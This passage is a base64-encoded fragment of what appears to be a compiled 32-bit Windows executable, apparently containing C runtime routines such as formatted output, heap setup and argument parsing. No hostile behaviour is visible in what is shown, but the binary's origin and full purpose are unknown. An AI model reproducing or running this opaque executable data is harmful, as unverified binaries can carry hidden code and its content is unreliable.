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LdQxX/3UQM/+Njaj7//+JhdD7//+JneT7//+Jvbj7//+Jvfj7//+JvdT7//+JvfT7//+Jvdz7//+JvcT7//+Jvdj7///oldr//zm90Pv//3Uz6Ojm//9XV1dXxwAWAAAAV+hw5v//g8QUgL20+///AHQKi4Ww+///g2Bw/YPI/+nECgAAO/d0yQ+3FjPJib3g+///ib3s+///ib28+///iZXo+///ZjvXD4SBCgAAagJfA/eDveD7//8AibXA+///D4xpCgAAjULgZoP4WHcPD7fCD76AQBQBEIPgD+sCM8APvoTBYBQBEGoHwfgEWYmFpPv//zvBD4f1CQAA/ySF8G8AEDPAg430+////4mFoPv//4mFxPv//4mF1Pv//4mF3Pv//4mF+Pv//4mF2Pv//+m8CQAAD7fCg+ggdEqD6AN0NoPoCHQlK8d0FYPoAw+FnQkAAION+Pv//wjpkQkAAION+Pv//wTphQkAAION+Pv//wHpeQkAAIGN+Pv//4AAAADpagkAAAm9+Pv//+lfCQAAZoP6KnUsg8MEiZ3k+///i1v8iZ3U+///hdsPjT8JAACDjfj7//8E953U+///6S0JAACLhdT7//9rwAoPt8qNRAjQiYXU+///6RIJAACDpfT7//8A6QYJAABmg/oqdSaDwwSJneT7//+LW/yJnfT7//+F2w+N5ggAAION9Pv////p2ggAAIuF9Pv//2vACg+3yo1ECNCJhfT7///pvwgAAA+3woP4SXRXg/hodEaD+Gx0GIP4dw+FpAgAAIGN+Pv//wAIAADplQgAAGaDPmx1FwP3gY34+///ABAAAIm1wPv//+l4CAAAg434+///EOlsCAAAg434+///IOlgCAAAD7cGZoP4NnUfZoN+AjR1GIPGBIGN+Pv//wCAAACJtcD7///pOAgAAGaD+DN1H2aDfgIydRiDxgSBpfj7////f///ibXA+///6RMIAABmg/hkD4QJCAAAZoP4aQ+E/wcAAGaD+G8PhPUHAABmg/h1D4TrBwAAZoP4eA+E4QcAAGaD+FgPhNcHAACDpaT7//8Ai4XQ+///Uo214Pv//8eF2Pv//wEAAADo+/v//+muBwAAD7fCg/hkD48vAgAAD4TAAgAAg/hTD48bAQAAdH6D6EF0ECvHdFkrx3QIK8cPhe8FAACDwiDHhaD7//8BAAAAiZXo+///g434+///QIO99Pv//wCNtfz7//+4AAIAAIm18Pv//4mF7Pv//w+NkAIAAMeF9Pv//wYAAADp7AIAAPeF+Pv//zAIAAAPhcgAAACDjfj7//8g6bwAAAD3hfj7//8wCAAAdQeDjfj7//8gi730+///g///dQW/////f4PDBPaF+Pv//yCJneT7//+LW/yJnfD7//8PhAgFAACF23ULoSBdARCJhfD7//+Dpez7//8Ai7Xw+///hf8PjiAFAACKBoTAD4QWBQAAjY2o+///D7bAUVDoCNf//1lZhcB0AUZG/4Xs+///Ob3s+///fNDp6wQAAIPoWA+E9wIAACvHD4SUAAAAK8EPhPb+//8rxw+FygQAAA+3A4PDBDP2RvaF+Pv//yCJtdj7//+JneT7//+JhZz7//90QoiFzPv//42FqPv//1CLhaj7///Ghc37//8A/7CsAAAAjYXM+///UI2F/Pv//1DoR1AAAIPEEIXAfQ+JtcT7///rB2aJhfz7//+Nhfz7//+JhfD7//+Jtez7///pRgQAAIsDg8MEiZ3k+///hcB0OotIBIXJdDP3hfj7//8ACAAAD78AiY3w+///dBKZK8LHhdj7//8BAAAA6QEEAACDpdj7//8A6fcDAAChIF0BEImF8Pv//1DokzEAAFnp4AMAAIP4cA+P+gEAAA+E4gEAAIP4ZQ+MzgMAAIP4Zw+O6f3//4P4aXRxg/hudCiD+G8PhbIDAAD2hfj7//+Ax4Xo+///CAAAAHRhgY34+///AAIAAOtVizODwwSJneT7///oQU8AAIXAD4QwBQAA9oX4+///IHQMZouF4Pv//2aJBusIi4Xg+///iQbHhcT7//8BAAAA6cEEAACDjfj7//9Ax4Xo+///CgAAAPeF+Pv//wCAAAAPhKsBAACLA4tTBIPDCOnnAQAAdRJmg/pndWPHhfT7//8BAAAA61c5hfT7//9+BomF9Pv//4G99Pv//6MAAAB+PYu99Pv//4HHXQEAAFfomBAAAIuV6Pv//1mJhbz7//+FwHQQiYXw+///ib3s+///i/DrCseF9Pv//6MAAACLA4PDCImFlPv//4tD/ImFmPv//42FqPv//1D/taD7//8PvsL/tfT7//+JneT7//9Q/7Xs+///jYWU+///VlD/NUBdARDoTfD//1n/0Iud+Pv//4PEHIHjgAAAAHQhg730+///AHUYjYWo+///UFb/NUxdARDoHfD//1n/0FlZZoO96Pv//2d1HIXbdRiNhaj7//9QVv81SF0BEOj37///Wf/QWVmAPi11EYGN+Pv//wABAABGibXw+///VukE/v//x4X0+///CAAAAImNuPv//+skg+hzD4Rn/P//K8cPhIr+//+D6AMPhckBAADHhbj7//8nAAAA9oX4+///gMeF6Pv//xAAAAAPhGr+//9qMFhmiYXI+///i4W4+///g8BRZomFyvv//4m93Pv//+lF/v//94X4+///ABAAAA+FRf7//4PDBPaF+Pv//yB0HPaF+Pv//0CJneT7//90Bg+/Q/zrBA+3Q/yZ6xf2hfj7//9Ai0P8dAOZ6wIz0omd5Pv///aF+Pv//0B0G4XSfxd8BIXAcxH32IPSAPfagY34+///AAEAAPeF+Pv//wCQAACL2ov4dQIz24O99Pv//wB9DMeF9Pv//wEAAADrGoOl+Pv///e4AAIAADmF9Pv//34GiYX0+///i8cLw3UGIYXc+///jbX7/f//i4X0+////430+///hcB/BovHC8N0LYuF6Pv//5lSUFNX6J5NAACDwTCD+TmJnZD7//+L+IvafgYDjbj7//+IDk7rvY2F+/3//yvGRveF+Pv//wACAACJhez7//+JtfD7//90WYXAdAeLzoA5MHRO/43w+///i43w+///xgEwQOs2hdt1C6EkXQEQiYXw+///i4Xw+///x4XY+///AQAAAOsJT2aDOAB0BkBAhf918yuF8Pv//9H4iYXs+///g73E+///AA+FZQEAAIuF+Pv//6hAdCupAAEAAHQEai3rDqgBdARqK+sGqAJ0FGogWGaJhcj7///Hhdz7//8BAAAAi53U+///i7Xs+///K94rndz7///2hfj7//8MdRf/tdD7//+NheD7//9TaiDokfX//4PEDP+13Pv//4u90Pv//42F4Pv//42NyPv//+iY9f//9oX4+///CFl0G/aF+Pv//wR1EldTajCNheD7///oT/X//4PEDIO92Pv//wB1dYX2fnGLvfD7//+Jtej7////jej7//+Nhaj7//9Qi4Wo+////7CsAAAAjYWc+///V1Do3UoAAIPEEImFkPv//4XAfin/tZz7//+LhdD7//+NteD7///ouvT//wO9kPv//4O96Pv//wBZf6brHION4Pv////rE4uN8Pv//1aNheD7///o4/T//1mDveD7//8AfCD2hfj7//8EdBf/tdD7//+NheD7//9TaiDolfT//4PEDIO9vPv//wB0E/+1vPv//+hB1v//g6W8+///AFmLtcD7//8PtwaJhej7//9mhcB0KouNpPv//4ud5Pv//4vQ6Zb1///oIdz//8cAFgAAADPAUFBQUFDpMvX//4C9tPv//wB0CouFsPv//4NgcP2LheD7//+LTfxfXjPNW+hpzf//ycONSQC3ZwAQmWUAEMtlABAoZgAQdWYAEIFmABDIZgAQ2GcAEIv/VYvsgex0BAAAoRxQARAzxYlF/FOLXRRWi3UIM8BX/3UQi30MjY20+///ibXE+///iZ3o+///iYWs+///iYX4+///iYXU+///iYX0+///iYXc+///iYWw+///iYXY+///6P3O//+F9nU16FTb///HABYAAAAzwFBQUFBQ6Nra//+DxBSAvcD7//8AdAqLhbz7//+DYHD9g8j/6c8KAAAz9jv+dRLoGdv//1ZWVlbHABYAAABW68UPtw+JteD7//+Jtez7//+Jtcz7//+Jtaj7//+JjeT7//9mO84PhHQKAABqAloD+jm14Pv//4m9oPv//w+MSAoAAI1B4GaD+Fh3Dw+3wQ+2gKAUARCD4A/rAjPAi7XM+///a8AJD7aEMMAUARBqCMHoBF6Jhcz7//87xg+EM////4P4Bw+H3QkAAP8khZB7ABAzwION9Pv///+JhaT7//+JhbD7//+JhdT7//+Jhdz7//+Jhfj7//+Jhdj7///psAkAAA+3wYPoIHRIg+gDdDQrxnQkK8J0FIPoAw+FhgkAAAm1+Pv//+mHCQAAg434+///BOl7CQAAg434+///AelvCQAAgY34+///gAAAAOlgCQAACZX4+///6VUJAABmg/kqdSuLA4PDBImd6Pv//4mF1Pv//4XAD402CQAAg434+///BPed1Pv//+kkCQAAi4XU+///a8AKD7fJjUQI0ImF1Pv//+kJCQAAg6X0+///AOn9CAAAZoP5KnUliwODwwSJnej7//+JhfT7//+FwA+N3ggAAION9Pv////p0ggAAIuF9Pv//2vACg+3yY1ECNCJhfT7///ptwgAAA+3wYP4SXRRg/hodECD+Gx0GIP4dw+FnAgAAIGN+Pv//wAIAADpjQgAAGaDP2x1EQP6gY34+///ABAAAOl2CAAAg434+///EOlqCAAAg434+///IOleCAAAD7cHZoP4NnUZZoN/AjR1EoPHBIGN+Pv//wCAAADpPAgAAGaD+DN1GWaDfwIydRKDxwSBpfj7////f///6R0IAABmg/hkD4QTCAAAZoP4aQ+ECQgAAGaD+G8PhP8HAABmg/h1D4T1BwAAZoP4eA+E6wcAAGaD+FgPhOEHAACDpcz7//8Ai4XE+///UY214Pv//8eF2Pv//wEAAADoUvD//1npuAcAAA+3wYP4ZA+PMAIAAA+EvQIAAIP4Uw+PGwEAAHR+g+hBdBArwnRZK8J0CCvCD4XsBQAAg8Egx4Wk+///AQAAAImN5Pv//4ON+Pv//0CDvfT7//8AjbX8+///uAACAACJtfD7//+Jhez7//8PjY0CAADHhfT7//8GAAAA6ekCAAD3hfj7//8wCAAAD4XJAAAAg434+///IOm9AAAA94X4+///MAgAAHUHg434+///IIu99Pv//4P//3UFv////3+DwwT2hfj7//8giZ3o+///i1v8iZ3w+///D4QFBQAAhdt1C6EgXQEQiYXw+///g6Xs+///AIu18Pv//4X/D44dBQAAigaEwA+EEwUAAI2NtPv//w+2wFFQ6F7L//9ZWYXAdAFGRv+F7Pv//zm97Pv//3zQ6egEAACD6FgPhPACAAArwg+ElQAAAIPoBw+E9f7//yvCD4XGBAAAD7cDg8MEM/ZG9oX4+///IIm12Pv//4md6Pv//4mFnPv//3RCiIXI+///jYW0+///UIuFtPv//8aFyfv//wD/sKwAAACNhcj7//9QjYX8+///UOicRAAAg8QQhcB9D4m1sPv//+sHZomF/Pv//42F/Pv//4mF8Pv//4m17Pv//+lCBAAAiwODwwSJnej7//+FwHQ6i0gEhcl0M/eF+Pv//wAIAAAPvwCJjfD7//90EpkrwseF2Pv//wEAAADp/QMAAIOl2Pv//wDp8wMAAKEgXQEQiYXw+///UOjoJQAAWencAwAAg/hwD4/2AQAAD4TeAQAAg/hlD4zKAwAAg/hnD47o/f//g/hpdG2D+G50JIP4bw+FrgMAAPaF+Pv//4CJteT7//90YYGN+Pv//wACAADrVYszg8MEiZ3o+///6JpDAACFwA+EVvr///aF+Pv//yB0DGaLheD7//9miQbrCIuF4Pv//4kGx4Ww+///AQAAAOnBBAAAg434+///QMeF5Pv//woAAAD3hfj7//8AgAAAD4SrAQAAA96LQ/iLU/zp5wEAAHUSZoP5Z3Vjx4X0+///AQAAAOtXOYX0+///fgaJhfT7//+BvfT7//+jAAAAfj2LvfT7//+Bx10BAABX6PEEAABZi43k+///iYWo+///hcB0EImF8Pv//4m97Pv//4vw6wrHhfT7//+jAAAAiwODwwiJhZT7//+LQ/yJhZj7//+NhbT7//9Q/7Wk+///D77B/7X0+///iZ3o+///UP+17Pv//42FlPv//1ZQ/zVAXQEQ6Kbk//9Z/9CLnfj7//+DxByB44AAAAB0IYO99Pv//wB1GI2FtPv//1BW/zVMXQEQ6Hbk//9Z/9BZWWaDveT7//9ndRyF23UYjYW0+///UFb/NUhdARDoUOT//1n/0FlZgD4tdRGBjfj7//8AAQAARom18Pv//1bpCP7//4m19Pv//8eFrPv//wcAAADrJIPocw+Eavz//yvCD4SK/v//g+gDD4XJAQAAx4Ws+///JwAAAPaF+Pv//4DHheT7//8QAAAAD4Rq/v//ajBYZomF0Pv//4uFrPv//4PAUWaJhdL7//+Jldz7///pRf7///eF+Pv//wAQAAAPhUX+//+DwwT2hfj7//8gdBz2hfj7//9AiZ3o+///dAYPv0P86wQPt0P8mesX9oX4+///QItD/HQDmesCM9KJnej7///2hfj7//9AdBuF0n8XfASFwHMR99iD0gD32oGN+Pv//wABAAD3hfj7//8AkAAAi9qL+HUCM9uDvfT7//8AfQzHhfT7//8BAAAA6xqDpfj7///3uAACAAA5hfT7//9+BomF9Pv//4vHC8N1BiGF3Pv//421+/3//4uF9Pv///+N9Pv//4XAfwaLxwvDdC2LheT7//+ZUlBTV+j3QQAAg8Ewg/k5iZ2Q+///i/iL2n4GA42s+///iA5O672Nhfv9//8rxkb3hfj7//8AAgAAiYXs+///ibXw+///dFmFwHQHi86AOTB0Tv+N8Pv//4uN8Pv//8YBMEDrNoXbdQuhJF0BEImF8Pv//4uF8Pv//8eF2Pv//wEAAADrCU9mgzgAdAYDwoX/dfMrhfD7///R+ImF7Pv//4O9sPv//wAPhWUBAACLhfj7//+oQHQrqQABAAB0BGot6w6oAXQEaivrBqgCdBRqIFhmiYXQ+///x4Xc+///AQAAAIud1Pv//4u17Pv//yveK53c+///9oX4+///DHUX/7XE+///jYXg+///U2og6Orp//+DxAz/tdz7//+LvcT7//+NheD7//+NjdD7///o8en///aF+Pv//whZdBv2hfj7//8EdRJXU2owjYXg+///6Kjp//+DxAyDvdj7//8AdXWF9n5xi73w+///ibXk+////43k+///jYW0+///UIuFtPv///+wrAAAAI2FnPv//1dQ6DY/AACDxBCJhZD7//+FwH4p/7Wc+///i4XE+///jbXg+///6BPp//8DvZD7//+DveT7//8AWX+m6xyDjeD7////6xOLjfD7//9WjYXg+///6Dzp//9Zg73g+///AHwg9oX4+///BHQX/7XE+///jYXg+///U2og6O7o//+DxAyDvaj7//8AdBP/taj7///omsr//4OlqPv//wBZi72g+///i53o+///D7cHM/aJheT7//9mO8Z0B4vI6aH1//85tcz7//90DYO9zPv//wcPhVD1//+AvcD7//8AdAqLhbz7//+DYHD9i4Xg+///i038X14zzVvoyMH//8nDi/9gcwAQWHEAEIpxABDlcQAQMXIAED1yABCDcgAQgnMAEIv/VYvsVlcz9v91COi5IAAAi/hZhf91JzkFaGMBEHYfVv8VsAABEI2G6AMAADsFaGMBEHYDg8j/i/CD+P91yovHX15dw4v/VYvsVlcz9moA/3UM/3UI6Io/AACL+IPEDIX/dSc5BWhjARB2H1b/FbAAARCNhugDAAA7BWhjARB2A4PI/4vwg/j/dcOLx19eXcOL/1WL7FZXM/b/dQz/dQjoXkAAAIv4WVmF/3UsOUUMdCc5BWhjARB2H1b/FbAAARCNhugDAAA7BWhjARB2A4PI/4vwg/j/dcGLx19eXcOL/1WL7Fe/6AMAAFf/FbAAARD/dQj/FZQAARCBx+gDAACB/2DqAAB3BIXAdN5fXcOL/1WL7OiwQwAA/3UI6P1BAAD/NRBYARDo/t7//2j/AAAA/9CDxAxdw4v/VYvsaBwDARD/FZQAARCFwHQVaAwDARBQ/xWYAAEQhcB0Bf91CP/QXcOL/1WL7P91COjI////Wf91CP8VtAABEMxqCOj0DwAAWcNqCOgRDwAAWcOL/1WL7FaL8OsLiwaFwHQC/9CDxgQ7dQhy8F5dw4v/VYvsVot1CDPA6w+FwHUQiw6FyXQC/9GDxgQ7dQxy7F5dw4v/VYvsgz0wfAEQAHQZaDB8ARDoukMAAFmFwHQK/3UI/xUwfAEQWejsOwAAaLABARBonAEBEOih////WVmFwHVCaNSGABDoBiMAALiIAQEQxwQkmAEBEOhj////gz00fAEQAFl0G2g0fAEQ6GJDAABZhcB0DGoAagJqAP8VNHwBEDPAXcNqGGiIMAEQ6BELAABqCOgQDwAAWYNl/AAz20M5HZxjARAPhMUAAACJHZhjARCKRRCilGMBEIN9DAAPhZ0AAAD/NSh8ARDojd3//1mL+Il92IX/dHj/NSR8ARDoeN3//1mL8Il13Il95Il14IPuBIl13Dv3clfoVN3//zkGdO0793JK/zboTt3//4v46D7d//+JBv/X/zUofAEQ6Djd//+L+P81JHwBEOgr3f//g8QMOX3kdQU5ReB0Dol95Il92IlF4IvwiXXci33Y659owAEBELi0AQEQ6F/+//9ZaMgBARC4xAEBEOhP/v//WcdF/P7////oHwAAAIN9EAB1KIkdnGMBEGoI6D4NAABZ/3UI6Pz9//8z20ODfRAAdAhqCOglDQAAWcPoNwoAAMOL/1WL7GoAagH/dQjow/7//4PEDF3DagFqAGoA6LP+//+DxAzDi/9W6HXc//+L8FbogiEAAFboaEUAAFboxcr//1boTUUAAFboOEUAAFboIEMAAFboFggAAFboA0MAAGgvfwAQ6Mfb//+DxCSjEFgBEF7DalRoqDABEOhyCQAAM/+JffyNRZxQ/xVMAAEQx0X8/v///2pAaiBeVugm/P//WVk7xw+EFAIAAKMgewEQiTUIewEQjYgACAAA6zDGQAQAgwj/xkAFCol4CMZAJADGQCUKxkAmCol4OMZANACDwECLDSB7ARCBwQAIAAA7wXLMZjl9zg+ECgEAAItF0DvHD4T/AAAAiziNWASNBDuJReS+AAgAADv+fAKL/sdF4AEAAADrW2pAaiDomPv//1lZhcB0VotN4I0MjSB7ARCJAYMFCHsBECCNkAAIAADrKsZABACDCP/GQAUKg2AIAIBgJIDGQCUKxkAmCoNgOADGQDQAg8BAixED1jvCctL/ReA5PQh7ARB8nesGiz0IewEQg2XgAIX/fm2LReSLCIP5/3RWg/n+dFGKA6gBdEuoCHULUf8VwAABEIXAdDyLdeCLxsH4BYPmH8HmBgM0hSB7ARCLReSLAIkGigOIRgRooA8AAI1GDFDox0MAAFlZhcAPhMkAAAD/Rgj/ReBDg0XkBDl94HyTM9uL88HmBgM1IHsBEIsGg/j/dAuD+P50BoBOBIDrcsZGBIGF23UFavZY6wqLw0j32BvAg8D1UP8VvAABEIv4g///dEOF/3Q/V/8VwAABEIXAdDSJPiX/AAAAg/gCdQaATgRA6wmD+AN1BIBOBAhooA8AAI1GDFDoMUMAAFlZhcB0N/9GCOsKgE4EQMcG/v///0OD+wMPjGf/////NQh7ARD/FbgAARAzwOsRM8BAw4tl6MdF/P7///+DyP/ocAcAAMOL/1ZXviB7ARCLPoX/dDGNhwAIAADrGoN/CAB0Co1HDFD/FcgAARCLBoPHQAUACAAAO/hy4v826I7D//+DJgBZg8YEgf4gfAEQfL5fXsODPSx8ARAAdQXoytX//1aLNcRfARBXM/+F9nUYg8j/6aAAAAA8PXQBR1boLRkAAFmNdAYBigaEwHXqagRHV+hu+f//i/hZWYk9fGMBEIX/dMuLNcRfARBT60JW6PwYAACL2EOAPj1ZdDFqAVPoQPn//1lZiQeFwHROVlNQ6GcYAACDxAyFwHQPM8BQUFBQUOhsx///g8QUg8cEA/OAPgB1uf81xF8BEOjQwv//gyXEXwEQAIMnAMcFIHwBEAEAAAAzwFlbX17D/zV8YwEQ6KrC//+DJXxjARAAg8j/6+SL/1WL7FGLTRBTM8BWiQeL8otVDMcBAQAAADlFCHQJi10Ig0UIBIkTiUX8gD4idRAzwDlF/LMiD5TARolF/Os8/weF0nQIigaIAkKJVQyKHg+2w1BG6BhCAABZhcB0E/8Hg30MAHQKi00Migb/RQyIAUaLVQyLTRCE23Qyg338AHWpgPsgdAWA+wl1n4XSdATGQv8Ag2X8AIA+AA+E6QAAAIoGPCB0BDwJdQZG6/NO6+OAPgAPhNAAAACDfQgAdAmLRQiDRQgEiRD/ATPbQzPJ6wJGQYA+XHT5gD4idSb2wQF1H4N9/AB0DI1GAYA4InUEi/DrDTPAM9s5RfwPlMCJRfzR6YXJdBJJhdJ0BMYCXEL/B4XJdfGJVQyKBoTAdFWDffwAdQg8IHRLPAl0R4XbdD0PvsBQhdJ0I+gzQQAAWYXAdA2KBotNDP9FDIgBRv8Hi00Migb/RQyIAesN6BBBAABZhcB0A0b/B/8Hi1UMRulW////hdJ0B8YCAEKJVQz/B4tNEOkO////i0UIXluFwHQDgyAA/wHJw4v/VYvsg+wMUzPbVlc5HSx8ARB1BehG0///aAQBAAC+oGMBEFZTiB2kZAEQ/xXMAAEQoTh8ARCJNYxjARA7w3QHiUX8OBh1A4l1/ItV/I1F+FBTU4199OgK/v//i0X4g8QMPf///z9zSotN9IP5/3NCi/jB5wKNBA87wXI2UOhx9v//i/BZO/N0KYtV/I1F+FAD/ldWjX306Mn9//+LRfiDxAxIo3BjARCJNXRjARAzwOsDg8j/X15bycOL/1WL7KGoZAEQg+wMU1aLNeAAARBXM9sz/zvDdS7/1ov4O/t0DMcFqGQBEAEAAADrI/8VHAABEIP4eHUKagJYo6hkARDrBaGoZAEQg/gBD4WBAAAAO/t1D//Wi/g7+3UHM8DpygAAAIvHZjkfdA5AQGY5GHX5QEBmORh18os13AABEFNTUyvHU9H4QFBXU1OJRfT/1olF+DvDdC9Q6Jf1//9ZiUX8O8N0IVNT/3X4UP919FdTU//WhcB1DP91/OiFv///WYld/Itd/Ff/FdgAARCLw+tcg/gCdAQ7w3WC/xXUAAEQi/A78w+Ecv///zgedApAO